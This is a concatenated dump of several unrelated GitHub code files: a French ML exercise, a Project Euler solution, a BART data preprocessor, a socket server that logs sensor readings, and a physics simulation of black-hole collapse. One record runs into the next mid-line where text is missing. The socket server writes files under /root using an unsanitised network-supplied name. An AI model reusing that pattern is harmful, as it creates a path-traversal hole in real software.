...\n\n\n# ### étape 1.2 : préparation des données\n# Utiliser l'algorithme de PCA de scikit-learn pour réduire la dimension des vecteurs de X à 3 features.\n\n# In[4]:\n\n\n# X_train_pca = ...\n\n\n# ### étape 2 : visualiser les données\n# Package de visualisation au choix (matplotlib, pyplot, ....)\n# \n# avec un peu de couleurs...\n\n# ### étape 3 : méthode non supervisée\n# appliquer **deux** méthodes de clustering de votre choix (par exemple k-means et DBSCAN)\n\n# ### étape 4 : méthode supervisée\n# appliquer **deux** méthodes d'apprentissage supervisées (dont une à base de [MLP](http://scikit-learn.org/stable/modules/neural_networks_supervised.html))\n\n# ### étape 5 : évaluation\n# Pour l'ensemble des 4 méthodes produites, évaluer la performance du modèle sur les données de test avec une métrique de votre choix.\n\n# ### étape 6 : question ouverte \n# En analysant les caractéristiques de votre modèle de PCA, indiquer combien de dimensions sont réellement nécessaires pour représenter 75% de l'information d'entraînement.\n\n# ### étape 7 : question facultative\n# Proposer un code qui utilise le package flask, qui sert une page web affichant votre nom, votre prénom, un lien qui mène vers [http://scikit-learn.org](http://scikit-learn.org) et qui affiche une figure de votre choix.\n\n# ### étape 8 : soumission\n# Envoyer votre script python ou votre notebook à mon adresse : [joris.guerry@edf.fr](mailto:joris.guerry@edf.fr)\n","repo_name":"jorisgu/tp_evaluation_python_edf","sub_path":"tp_stage.py","file_name":"tp_stage.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23693647674","text":"'''\nPE 19:\nYou are given the following information, but you may prefer to do some research for yourself.\n\n1 Jan 1900 was a Monday.\nThirty days has September,\nApril, June and November.\nAll the rest have thirty-one,\nSaving February alone,\nWhich has twenty-eight, rain or shine.\nAnd on leap years, twenty-nine.\nA leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.\nHow many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n'''\n\n# From 1st to 1st Table:\n# 31 -> +3 days of the week\n# 30 -> +2\n# 29 -> +1\n# 28 -> +0\n\nmonths = [3,0,3,2,3,2,3,3,2,3,2,3]\n\nleap_months = [3,1,3,2,3,2,3,3,2,3,2,3]\n\n# days are labeled 1,2,3,4,5,6,7\n\n#start on monday\nd = 2\n\nsunday_sum = 0\n\nfor i in range(1900,2001):\n\n if(i>1900 and i%4 == 0):\n\n for x in leap_months:\n\n if(d==1):\n sunday_sum += 1\n\n d += x\n\n if(d>7):\n d = d-7\n\n else:\n\n for x in months:\n\n\n #Those sneaky bastards didn't count 1900, they start at 1901.\n #Otherwise this code would have been perfect on the first try.\n #This for loop cycles through 1900 to keep the day of the\n #week accurate, but the next if statement doesn't count the 1900 sunday months.\n if(d==1 and i>1900):\n sunday_sum += 1\n\n d += x\n\n if(d>7):\n d = d-7\n\nprint(sunday_sum)\n","repo_name":"Clayton-Adamson/Python-projects","sub_path":"euler19/euler19.py","file_name":"euler19.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11138578392","text":"import argparse\nimport csv\nimport datetime\nimport logging\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport urllib\n\nimport torch\n\nROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nDATA = os.path.join(ROOT, \"data\")\n\n# https://www.bart.gov/about/reports/ridership\nSOURCE_DIR = \"http://64.111.127.166/origin-destination/\"\nSOURCE_FILES = [\n \"date-hour-soo-dest-2011.csv.gz\",\n \"date-hour-soo-dest-2012.csv.gz\",\n \"date-hour-soo-dest-2013.csv.gz\",\n \"date-hour-soo-dest-2014.csv.gz\",\n \"date-hour-soo-dest-2015.csv.gz\",\n \"date-hour-soo-dest-2016.csv.gz\",\n \"date-hour-soo-dest-2017.csv.gz\",\n \"date-hour-soo-dest-2018.csv.gz\",\n]\n\n\ndef mkdir_p(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef _load_hourly_od(args_basename):\n args, basename = args_basename\n filename = os.path.join(DATA, basename.replace(\".csv.gz\", \".pkl\"))\n if os.path.exists(filename):\n return torch.load(filename)\n\n # Download source files.\n mkdir_p(DATA)\n gz_filename = os.path.join(DATA, basename)\n if not os.path.exists(gz_filename):\n url = SOURCE_DIR + basename\n logging.debug(\"downloading {}\".format(url))\n urllib.request.urlretrieve(url, gz_filename)\n csv_filename = gz_filename[:-3]\n assert csv_filename.endswith(\".csv\")\n if not os.path.exists(csv_filename):\n logging.debug(\"unzipping {}\".format(gz_filename))\n subprocess.check_call([\"gunzip\", \"-k\", gz_filename])\n assert os.path.exists(csv_filename)\n\n # Convert to PyTorch.\n logging.debug(\"converting {}\".format(csv_filename))\n start_date = datetime.datetime.strptime(\"2000-01-01\", \"%Y-%m-%d\")\n stations = {}\n num_rows = sum(1 for _ in open(csv_filename))\n logging.info(\"Formatting {} rows\".format(num_rows))\n rows = torch.empty((num_rows, 4), dtype=torch.long)\n with open(csv_filename) as f:\n for i, (date, hour, origin, destin, trip_count) in enumerate(csv.reader(f)):\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n date += datetime.timedelta(hours=int(hour))\n rows[i, 0] = int((date - start_date).total_seconds() / 3600)\n rows[i, 1] = stations.setdefault(origin, len(stations))\n rows[i, 2] = stations.setdefault(destin, len(stations))\n rows[i, 3] = int(trip_count)\n if i % 10000 == 0:\n sys.stderr.write(\".\")\n sys.stderr.flush()\n\n # Save data with metadata.\n dataset = {\n \"args\": args,\n \"basename\": basename,\n \"start_date\": start_date,\n \"stations\": stations,\n \"rows\": rows,\n \"schema\": [\"time_hours\", \"origin\", \"destin\", \"trip_count\"],\n }\n logging.debug(\"saving {}\".format(filename))\n torch.save(dataset, filename)\n return dataset\n\n\ndef load_hourly_od(args=None):\n filename = os.path.join(DATA, \"full-counts.pkl\")\n if os.path.exists(filename):\n return torch.load(filename)\n\n datasets = multiprocessing.Pool().map(_load_hourly_od, [\n (args, basename)\n for basename in SOURCE_FILES\n ])\n\n stations = sorted(set().union(*(d[\"stations\"].keys() for d in datasets)))\n min_time = min(int(d[\"rows\"][:, 0].min()) for d in datasets)\n max_time = max(int(d[\"rows\"][:, 0].max()) for d in datasets)\n num_rows = max_time - min_time + 1\n start_date = datasets[0][\"start_date\"] + datetime.timedelta(hours=min_time),\n logging.info(\"Loaded data from {} stations, {} hours\"\n .format(len(stations), num_rows))\n\n result = torch.zeros(num_rows, len(stations), len(stations))\n for dataset in datasets:\n part_stations = sorted(dataset[\"stations\"], key=dataset[\"stations\"].__getitem__)\n part_to_whole = torch.tensor(list(map(stations.index, part_stations)))\n time = dataset[\"rows\"][:, 0] - min_time\n origin = part_to_whole[dataset[\"rows\"][:, 1]]\n destin = part_to_whole[dataset[\"rows\"][:, 2]]\n count = dataset[\"rows\"][:, 3].float()\n result[time, origin, destin] = count\n dataset.clear()\n logging.info(\"Loaded {} shaped data of mean {:0.3g}\"\n .format(result.shape, result.mean()))\n\n dataset = {\n \"args\": args,\n \"stations\": stations,\n \"start_date\": start_date,\n \"counts\": result,\n }\n torch.save(dataset, filename)\n return dataset\n\n\ndef main(args):\n load_hourly_od(args)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"BART data preprocessor\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n args = parser.parse_args()\n\n logging.basicConfig(format='%(relativeCreated) 9d %(message)s',\n level=logging.DEBUG if args.verbose else logging.INFO)\n main(args)\n","repo_name":"pyro-ppl/sandbox","sub_path":"2019-08-time-series/bart/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"8152293577","text":"from Models.SimulazioneModel import SimulazioneModel\nfrom Models.ProblemiSimulazioneModel import ProblemiSimulazioneModel\nimport time\n\n\ndef CheckEnd(simulazione):\n sim=SimulazioneModel.find_by_nome(simulazione)\n now=int(time.time())\n try:\n expected_end=sim.inizio+sim.durata\n if expected_end 1:\r\n if len(data.split(' ')[1]) > 1:\r\n message: str = data.split(' ')[1]\r\n message = message.split(';')\r\n msg_time = datetime.now().strftime('%H:%M:%S')\r\n msg_len = len(message)\r\n msg_type = message[0]\r\n if msg_type == '/DATA':\r\n msg_from = message[1]\r\n\r\n for i in range(2, msg_len):\r\n message[i] = message[i].replace('.', ',')\r\n\r\n str_msg = ' '.join(message[2:msg_len+1])\r\n str_to_send = msg_time + '///' + str_msg\r\n print(str(address[0]) + ' [' + msg_time + ']' + ' From ' + msg_from + ' got: ' + str_msg)\r\n message[1] = msg_time\r\n with open('/root/fermer/' + msg_from + '_' + datetime.now().strftime('%d-%m-%y') + '.csv', mode='a') as file:\r\n file.write(msg_time + ';' + ';'.join(message[2:msg_len+1])+'\\n')\r\n else:\r\n HDR = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n'\r\n client_socket.send(HDR.encode('utf-8') + str_to_send.encode('utf-8'))\r\n else:\r\n HDR = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n'\r\n client_socket.send(HDR.encode('utf-8') + str_to_send.encode('utf-8'))\r\n\r\n\r\nif __name__ == '__main__':\r\n start_my_server()","repo_name":"okwell-me/fermer","sub_path":"fermer.py","file_name":"fermer.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25209392737","text":"import sys\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom scipy.ndimage import gaussian_filter1d\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import minimize_scalar\nfrom scipy import stats\n\nfrom ms_hm.utils import *\nfrom ms_hm.timer import *\n\nfrom ipywidgets import HTML\nfrom IPython.display import display\nimport time\n\nclass HM:\n \"\"\"\n Class to integrate the Hernandez-Misner equations to study\n critical collapse of a fluid to a black hole.\n\n Equations integrated are 166a - 166d in\n https://arxiv.org/pdf/1504.02071.pdf .\n These have been slightly modified to allow for a general\n (local, temperature-dependent) pressure term.\n \"\"\"\n\n def __init__(self, MS, mOverR=0.999, sm_sigma=5,\n Abar=None, cflfac=0.2):\n\n self.timer = timer()\n \n # Try to work in case raytracing didn't finish\n R = MS.R_hm\n self.N = np.max(np.where(R>0))\n\n self.R = MS.R_hm[:self.N]\n self.m = MS.m_hm[:self.N]\n self.U = MS.U_hm[:self.N]\n self.xi = MS.xi_hm[:self.N]\n self.rho_p = MS.rho_hm[:self.N]\n self.Abar = MS.Abar[:self.N]\n\n if Abar is not None :\n print(\"Computing field values at specified Abar\")\n Abar_max = np.searchsorted(Abar, self.Abar[-1], \"left\")\n\n self.R = np.interp(Abar[:Abar_max], self.Abar, self.R)\n self.m = np.interp(Abar[:Abar_max], self.Abar, self.m)\n self.U = np.interp(Abar[:Abar_max], self.Abar, self.U)\n self.xi = np.interp(Abar[:Abar_max], self.Abar, self.xi)\n self.rho_p = np.interp(Abar[:Abar_max], self.Abar, self.rho_p)\n self.Abar = Abar[:Abar_max]\n\n self.Abar_stg = self.to_stg(self.Abar)\n \n self.sm_sigma = sm_sigma\n\n self.w0 = MS.w0\n self.alpha = MS.alpha\n\n self.qcd = MS.qcd\n\n self.t0 = MS.t0\n self.t = self.t0\n self.u = 0\n self.RH = MS.RH\n\n self.qcd = MS.qcd\n self.w0 = MS.w0\n self.alpha = MS.alpha\n\n # self.kappa = 2\n self.Q = np.zeros(self.N)\n self.Q_du = np.zeros(self.N)\n self.Q_old = np.zeros(self.N)\n self.Qprime = np.zeros(self.N)\n\n self.tmp = 0\n \n self.deltau_i = self.cfl_deltau(self.R, self.m, self.U, self.xi) * cflfac\n self.deltau_adap = self.deltau_i\n\n self.mOverR = mOverR\n\n self.step = 0\n\n self.start_time = time.process_time()\n self.display = HTML(value=\"Running HM simulation.\")\n display(self.display)\n\n self.mass_data = np.array([])\n self.max2moR_data = np.array([])\n\n return\n\n def dfdA0(self, field) :\n \"\"\"\n First derivative of a field at the origin\n \"\"\"\n A = self.Abar\n\n # Second-order expression\n # return 1/(A[2]-A[1]) * (\n # A[1]/A[2]*(field[2]-field[0]) - A[2]/A[1]*(field[1]-field[0])\n # )\n\n # first-order expression\n return np.amin([\n (field[1]-field[0])/(A[1]-A[0])\n # , (field[2]-field[0])/(A[2]-A[0])\n ])\n\n # convert to half grid\n def to_stg(self,arr):\n return (arr[0:-1] + arr[1:]) / 2\n\n def to_cubic_stg(self,arr):\n a1 = arr[0:-1] ** 3\n a2 = arr[1:] ** 3\n return (a1 + a2) / (np.abs(a1 + a2)) * ( np.abs(a1 + a2)/ 2) **(1/3)\n\n def gamma(self, R, m, U, xi):\n return np.sqrt(np.exp(2 * (1 - self.alpha) * xi)\n + (self.Abar * R)**2 * (U**2 - m))\n \n def P(self, rho) :\n \"\"\"\n Compute (tilded) pressure as a function of (tilded) density.\n \"\"\"\n self.timer.start(\"P\")\n H = np.exp(-self.xi) / self.RH\n rhob = 3 / (8*np.pi) * H**2\n realRho = rho * rhob\n realP = self.qcd.P(realRho)\n P = realP/rhob\n self.timer.stop(\"P\")\n return P\n \n # return the L2 error in rho\n def rho_err(self, R, m, U, xi, g, xiprime, Rprime, mprime, P, rho_p):\n temp = rho_p * g - P * self.Abar * R * U - (g + self.Abar * R * U) \\\n * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n # temp = rho_p - (g + self.Abar * R * U) / (g - P/rho_p * self.Abar * R * U ) \\\n # * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n return temp\n \n def rho_err_prime(self, R, m, U, xi, g, xiprime, Rprime, mprime, dPdrho, rho_p):\n temp = g - dPdrho * self.Abar * R * U \\\n #- (g + self.Abar * R * U) \\\n # * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n #print((m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3))\n #print(np.abs(temp).min())\n \n #print( [(rho_p * g)[0] , (dPdrho * self.Abar * R * U)[0], (g + self.Abar * R * U)[0], (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)[0] ] )\n self.tmp = temp\n return temp\n \n def rho(self, R, m, U, xi, g, xiprime, Rprime, mprime):\n self.timer.start(\"rho\")\n\n H = np.exp(-self.xi) / self.RH\n rhob = 3 / (8*np.pi) * H**2\n \n err = np.ones_like(R)\n\n while( np.linalg.norm(err) > 1e-5 ):\n # print(np.linalg.norm(err))\n\n # Iterative method (slower)\n # P = self.qcd.P(self.rho_p * rhob) / rhob\n # rho_std = (g + self.Abar * R * U) / (g - P/self.rho_p * self.Abar * R * U ) \\\n # * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n # err = rho_std - self.rho_p\n # self.rho_p = rho_std\n\n # Newton's method\n dPdrho = self.qcd.dPdrho(self.rho_p * rhob)\n P = self.qcd.P(self.rho_p * rhob) / rhob\n err = self.rho_err(R, m, U, xi, g, xiprime, Rprime, mprime, P, self.rho_p)\n err_prime = self.rho_err_prime(R, m, U, xi, g, xiprime, Rprime, mprime, dPdrho, self.rho_p)\n self.rho_p = self.rho_p - err / err_prime\n \n self.rho_p = gaussian_filter1d(self.rho_p, sigma=self.sm_sigma, mode='nearest')\n\n if(len(self.rho_p[self.rho_p<=0]) > 0) :\n self.rho_p[self.rho_p<=0] = 1.0e-10\n # plt.plot(self.rho_p)\n # raise ValueError('Rho is negative.')\n\n self.timer.stop(\"rho\")\n return self.rho_p\n\n def rho_stg(self, R, m, U, xi, g, xiprime, Rprime, mprime):\n R_stg = self.to_stg(R)\n m_stg = self.to_stg(m)\n U_stg = self.to_stg(U)\n g_stg = self.to_stg(g)\n #R_stg = WENO_to_stg(R)\n #m_stg = WENO_to_stg(m)\n #U_stg = WENO_to_stg(U)\n #g_stg = WENO_to_stg(g)\n A_stg = self.Abar_stg\n\n H = np.exp(-self.xi) / self.RH\n rhob = 3 / (8*np.pi) * H**2\n P = self.qcd.P(rho_p * rhob) / rhob\n \n err = rho_err(R, m, U, xi, g, xiprime, Rprime, mprime, P, rho_p)\n \n temp = (g_stg + A_stg * R_stg * U_stg) / (g_stg - (self.w + Q_stg ) * A_stg * R_stg * U_stg ) \\\n * (m_stg + A_stg * R_stg * rho_term_stg(R, m, self.Abar, xi, R_stg, m_stg, A_stg, self.alpha) / 3)\n #temp = scipy.signal.savgol_filter(temp, 31, 3, mode='interp')\n return temp\n\n def ephi(self, R, U, g, xi, xiprime, Rprime):\n \"\"\"\n Return e^(phi), as described in Eq. 165c\n \"\"\"\n return ephi_term(R, U, self.Abar, xi, g, self.alpha)\n\n def elambda2(self, ephi, exi, xiprime):\n \"\"\"\n Return e^(lambda/2), as described in Eq. 165d\n \"\"\"\n return self.alpha * ephi * exi * xiprime\n\n def epsi(self, R, U, g, xi, rho, ephi, Q):\n c = self.alpha - 1 + ephi * self.Abar * R * rho * (1 + Q) /\\\n ((g + self.Abar * R * U) * (1+self.w0))\n offset = np.log(1/ephi[-1] * (g[-1] + self.Abar[-1] * R[-1] * U[-1]))\n temp = inv_derv_psi(xi, c, offset)\n return (g + self.Abar * R * U) / np.exp(temp)\n\n def drho(self, R, m, U, g, xi, Rp, mp, xip):\n rho_stg = self.rho_stg(R, m, U, xi, g, xip, Rp, mp)\n return np.concatenate( ([0], stg_dfdA(rho_stg, self.to_stg(self.Abar)) ,[0]) )\n\n def set_Q_old(self, R, m, U, xi):\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n Uprime = WENO_dfdA(U, self.Abar, 1e100)\n\n #xiprime = WENO_nuni_dfdA(xi, self.Vbar, self.Abar, 1e100)\n #Rprime = WENO_nuni_dfdA(R, self.Vbar, self.Abar, 1e100)\n #mprime = WENO_nuni_dfdA(m, self.Vbar, self.Abar, 1e100)\n #Uprime = WENO_nuni_dfdA(U, self.Vbar, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n p = self.P(r)\n self.Q_old = p / r\n \n def k_coeffs(self, R, m, U, xi) :\n self.timer.start(\"k_coeffs\")\n\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n Uprime = WENO_dfdA(U, self.Abar, 1e100)\n\n #xiprime = WENO_nuni_dfdA(xi, self.Vbar, self.Abar, 1e100)\n #Rprime = WENO_nuni_dfdA(R, self.Vbar, self.Abar, 1e100)\n #mprime = WENO_nuni_dfdA(m, self.Vbar, self.Abar, 1e100)\n #Uprime = WENO_nuni_dfdA(U, self.Vbar, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n p = self.P(r)\n Q = p / r\n Q_du = (Q - self.Q_old) / self.deltau\n Qprime = WENO_dfdA(Q, self.Abar, 1e100)\n\n exi = np.exp(xi)\n ephi = self.ephi(R, U, g, xi, xiprime, Rprime)\n elambda2 = self.elambda2(ephi, exi, xiprime)\n epsi = self.epsi(R, U, g, xi, r, ephi, p / r)\n\n # drho = self.drho(R, m, U, g, xi, Rprime, mprime, xiprime)\n drho = dfdA(r, self.Abar, 1e100)\n drho[0] = 3 * elambda2[0] / exi[0] * ((1 + self.w0) * r[0] / ephi[0] - (r[0] + p[0]) * U[0])\n drho[-1] = 0\n\n kxi = epsi / ephi / np.exp(xi) / self.alpha\n\n kR = epsi / exi * R * (U - 1/ephi)\n\n km = 3 * epsi / exi * (1/ephi * m * (1+self.w0) - U * (p +m))\n\n kU = - epsi / exi / (1 - Q) * (\n (m + 3 * p) / 2 + U**2 - U / self.alpha / ephi\n + (Q) * exi / elambda2 * Uprime \\\n + g * Q/(1+Q) / ( np.concatenate( ([1], self.Abar[1:]) )*R ) * (\n 3*(1 + Q)*U\n + exi*(Qprime / elambda2 - Q_du / epsi)/Q\n - 3*(1 + self.w0)*(1/ephi)\n + exi/elambda2*drho/r\n )\n )\n\n # boundary conditions\n # As described by Eq. 167\n kxi[0] = epsi[0] / elambda2[0] * self.dfdA0(xi)\n kR[0] = epsi[0] / elambda2[0] * self.dfdA0(R)\n km[0] = epsi[0] / elambda2[0] * self.dfdA0(m)\n kU[0] = epsi[0] / elambda2[0] * self.dfdA0(U)\n\n self.timer.stop(\"k_coeffs\")\n return kxi, kR, km, kU\n\n def check_progress(self, n_steps) :\n \n mass, max2moR = self.BH_mass2()\n self.mass_data = np.append(self.mass_data, mass)\n self.max2moR_data = np.append(self.max2moR_data, max2moR)\n\n if(max2moR > self.mOverR):\n print('2m/R is larger than ' + str(self.mOverR))\n return 1\n\n if(self.step%20==0) :\n self.display.value = \"Running HM sim, step \"+str(self.step)+\" of max \"+str(n_steps)\\\n +\". Current u is \"+str(self.u)+\", max 2m/R is currently \"+str(max2moR)+\".
    \"\\\n +\"Time Elapsed is: \"+str(time.process_time() - self.start_time)+\" s\"\n\n if(self.step%1000==0) :\n print(\"u:\", self.u, \"time:\", time.process_time() - self.start_time,\n \"step:\", self.step, \"max2moR:\", max2moR, \"mass:\", mass)\n\n return 0\n\n def extrap_mass(self, start=-25, len=15, incr=500) :\n mextraps = []\n\n for s in range(start, -len-1) :\n e=s+len\n x = self.max2moR_data[s*incr:e*incr:incr]\n y = self.mass_data[s*incr:e*incr:incr]\n fit = stats.linregress(x, y)\n mextrap = fit.slope*1 + fit.intercept\n mextraps.append(mextrap)\n\n self.mextraps = mextraps\n return mextraps[-1], np.mean(mextraps), np.std(mextraps)\n\n def adap_run_steps(self, n_steps, adj_intv=-1, tol=1e-7) :\n\n deltau = self.deltau_adap\n self.deltau = deltau\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n\n kxi1, kR1, km1, kU1 = self.k_coeffs(self.R, self.m, self.U, self.xi)\n\n while(self.step < n_steps) :\n self.timer.start(\"adap_run_steps\")\n\n # if(self.step % 200 == 0) : \n #plt.plot(np.sqrt(np.exp(2 * (1 - self.alpha) * self.xi)))\n # plt.semilogy(self.R**2 * self.m * self.Abar**2 * np.exp(2 * (self.alpha-1) * self.xi))\n if (deltau < 1e-10):\n print(\"Warning, the time step is too small!\")\n break\n if self.check_progress(n_steps) > 0 :\n break\n\n self.deltau = deltau\n kxi2, kR2, km2, kU2 = self.k_coeffs(self.R + deltau/2*kR1, self.m + deltau/2*km1,\n self.U + deltau/2*kU1, self.xi + deltau/2*kxi1)\n kxi3, kR3, km3, kU3 = self.k_coeffs(self.R + 3*deltau/4*kR2, self.m + 3*deltau/4*km2,\n self.U + 3*deltau/4*kU2, self.xi + 3*deltau/4*kxi2)\n\n\n\n xi_new = self.xi + deltau/9*(2*kxi1 + 3*kxi2 + 4*kxi3 )\n R_new = self.R + deltau/9*(2*kR1 + 3*kR2 + 4*kR3 )\n m_new = self.m + deltau/9*(2*km1 + 3*km2 + 4*km3 )\n U_new = self.U + deltau/9*(2*kU1 + 3*kU2 + 4*kU3 )\n\n kxi4, kR4, km4, kU4 = self.k_coeffs(R_new , m_new , U_new, xi_new)\n\n E_xi = np.max( np.abs(deltau * (-5*kxi1/72 + kxi2/12 + kxi3/9 - kxi4/8)))\n E_R = np.max( np.abs((deltau * (-5*kR1/72 + kR2/12 + kR3/9 - kR4/8))))\n E_m = np.max( np.abs(deltau * (-5*km1/72 + km2/12 + km3/9 - km4/8)))\n E_U = np.max( np.abs(deltau * (-5*kU1/72 + kU2/12 + kU3/9 - kU4/8)))\n\n max_err_xi = np.max(np.abs(self.xi)) * tol\n max_err_R = np.max(np.abs(self.R)) * tol\n max_err_m = np.max(np.abs(self.m)) * tol\n max_err_U = np.max(np.abs(self.U)) * tol\n\n if(E_xi < max_err_xi and E_R < max_err_R and E_m < max_err_m and E_U < max_err_U):\n self.xi = xi_new\n self.R = R_new\n self.m = m_new\n self.U = U_new\n\n kxi1 = np.copy(kxi4)\n kR1 = np.copy(kR4)\n km1 = np.copy(km4)\n kU1 = np.copy(kU4)\n\n self.step += 1\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n self.u += deltau\n\n # Adjust step size.\n self.q = 0.8*np.min((max_err_xi/E_xi, max_err_R/E_R, max_err_m/E_m, max_err_U/E_U) )**(1/3) # conservative optimal step factor\n self.q = min(self.q,10) # limit stepsize growth\n deltau *= self.q\n self.deltau_adap = deltau\n\n self.timer.stop(\"adap_run_steps\")\n\n\n def run_steps(self, n_steps, adj_intv=-1) :\n\n deltau = self.deltau_i\n self.deltau = deltau\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n\n while(self.step < n_steps) :\n self.timer.start(\"run_steps\")\n\n if self.check_progress(n_steps) > 0 :\n break\n\n if(adj_intv > 0 and self.step % adj_intv == 0):\n deltau = self.cfl_deltau(self.R, self.m, self.U, self.xi) * 0.05\n\n self.deltau = deltau\n #der_U = dfdA(np.exp(self.xi * (self.alpha-1)) * self.Abar * self.R * self.U , self.Abar, 1e100)\n\n #self.Q = self.kappa * (self.Abar[1])**2 * der_U**2\n #Q = self.w*np.ones_like(p)\n #self.Qprime = dfdA(self.Q , self.Abar, 1e100)\n #self.Q_du = (Q - self.Q_old) / deltau\n\n #self.Q[der_U > 0] = 0\n #self.Qprime[der_U>0] = 0\n #self.Q_du[der_U>0] = 0\n\n kxi1, kR1, km1, kU1 = self.k_coeffs(self.R, self.m, self.U, self.xi)\n kxi2, kR2, km2, kU2 = self.k_coeffs(self.R + deltau/2*kR1, self.m + deltau/2*km1,\n self.U + deltau/2*kU1, self.xi + deltau/2*kxi1)\n kxi3, kR3, km3, kU3 = self.k_coeffs(self.R + deltau/2*kR2, self.m + deltau/2*km2,\n self.U + deltau/2*kU2, self.xi + deltau/2*kxi2)\n kxi4, kR4, km4, kU4 = self.k_coeffs(self.R + deltau*kR3, self.m + deltau*km3,\n self.U + deltau*kU3, self.xi + deltau*kxi3)\n\n # print(deltau, ((kU1 + 2*kU2 + 2*kU3 + kU4)), self.U)\n\n self.xi = self.xi + (deltau/6*(kxi1 + 2*kxi2 + 2*kxi3 + kxi4))\n self.R = self.R + (deltau/6*(kR1 + 2*kR2 + 2*kR3 + kR4))\n self.m = self.m + (deltau/6*(km1 + 2*km2 + 2*km3 + km4))\n self.U = self.U + (deltau/6*(kU1 + 2*kU2 + 2*kU3 + kU4))\n\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n self.step += 1\n self.u += deltau\n\n self.timer.stop(\"run_steps\")\n\n def BH_mass(self):\n xi = self.xi\n R = self.R\n m = self.m\n U = self.U\n\n mOverR = (R**2 * m * self.Abar**2 * np.exp(2*(self.alpha-1)*xi))\n\n if(mOverR.max() < self.mOverR):\n print('2m/R is less than the threshold, no BH forms!')\n return -1\n\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n exi = np.exp(xi)\n ephi = self.ephi(R, U, g, xi, xiprime, Rprime)\n elambda2 = self.elambda2(ephi, exi, xiprime)\n epsi = self.epsi(R, U, g, xi, r, ephi)\n for pos in range(self.N):\n if epsi[pos] > 1e-6:\n break\n\n a = np.exp(self.alpha * self.xi)\n H = np.exp(-self.xi) / self.RH\n rho_b = a**(1+self.w0)\n Rb = a * self.A\n\n return (( (np.exp(-self.xi/2) * self.R **3 * self.Abar**3 * self.m ) / 2 )[pos])\n\n def BH_mass2(self):\n xi = self.xi\n R = self.R\n m = self.m\n U = self.U\n\n mOverR = (R**2 * m * self.Abar**2 * np.exp(2*(self.alpha-1)*xi))\n xs = np.arange(len(mOverR))\n xnearmax = max(2, min( mOverR.argmax(), len(mOverR)-2 ))\n fn_mOverR = interp1d(xs, -1*mOverR, kind='cubic')\n xatmax = minimize_scalar(fn_mOverR, bounds=(xnearmax-1, xnearmax+1), method='bounded')\n xatmax = xatmax.x\n\n mass_expr = (np.exp(-self.xi/2) * self.R **3 * self.Abar**3 * self.m ) / 2\n fn_mass_expr = interp1d(xs, mass_expr, kind='cubic')\n\n return fn_mass_expr(xatmax), -1.0*fn_mOverR(xatmax)\n\n\n def cfl_deltau(self, R, m, U, xi):\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n #p = self.P(r)\n exi = np.exp(xi)\n ephi = self.ephi(R, U, g, xi, xiprime, Rprime)\n elambda2 = self.elambda2(ephi, exi, xiprime)\n epsi = self.epsi(R, U, g, xi, r, ephi, self.w0)\n return ((1 / np.sqrt(self.w0) - 1) * (self.Abar[1] - self.Abar[0]) * elambda2 / epsi).min()\n","repo_name":"jbmertens/criticalcollapse","sub_path":"ms_hm/HM.py","file_name":"HM.py","file_ext":"py","file_size_in_byte":19541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13189969704","text":"#! /usr/bin/env AFDKOPython\n# encoding: UTF-8\nfrom __future__ import division, absolute_import, print_function, unicode_literals\nimport hindkit\n\ndef client_override(self):\n if self.name == \"Google Fonts\":\n 